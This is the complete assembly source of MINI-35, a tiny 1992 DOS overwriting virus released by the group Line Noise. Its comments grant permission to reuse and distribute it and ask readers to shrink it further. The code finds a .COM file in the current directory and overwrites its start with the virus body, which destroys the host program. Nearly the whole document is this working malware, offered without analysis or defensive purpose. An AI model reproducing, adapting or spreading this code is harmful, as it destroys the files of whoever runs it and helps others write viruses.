; MINI-35 is Copyright (C) by Line Noise 1992... ; You are allowed to use this code in your own ; programs if you want, you are allowed to ; give this source away, sell it or whatever... ; None of the members of Line Noise should be held ; responsible for the consequences of the use ; of this program.... ; Use this program at your own risk... ; Iow if you use this code, you agree with the above... ; The MINI-35 is based upon the MINI-45 from bulgaria(?). ; If anybody manages to shrink the code even more then ; leave me(Dark Wolf) a message at your nearest Virus BBS... ; ; Greetings from Dark Wolf/Line Noise SEG_A SEGMENT BYTE PUBLIC ASSUME CS:SEG_A, DS:SEG_A ORG 100h MINI PROC START: MOV AH,4Eh MOV DX,OFFSET FMATCH ;address to file match INT 21h ;DOS int, ah=function 4Eh ;find 1st filenam match@DS:DX MOV AX,3D02h ;02=for read & write... MOV DX,9Eh ;address to filename... INT 21h ;DOS Services ah=function 3Dh ;open file, AL=mode,name@DS:DX XCHG AX,BX ;BX = handle now MOV DX,100h MOV AH,40h ;Function 40h, write file MOV CL,35 ;number of bytes to write INT 21h ;CX=bytes, to DS:DX ;BX=file handle MOV AH,3Eh ;function 3Eh, close file INT 21h ;BX=file handle RETN FMATCH: DB '*.C*',0 ;The virus didn't want to ;work when I changed this ;to *.* or *... ;WHY NOT?! Anybody gotta ;hint on this?! MINI ENDP SEG_A ENDS END START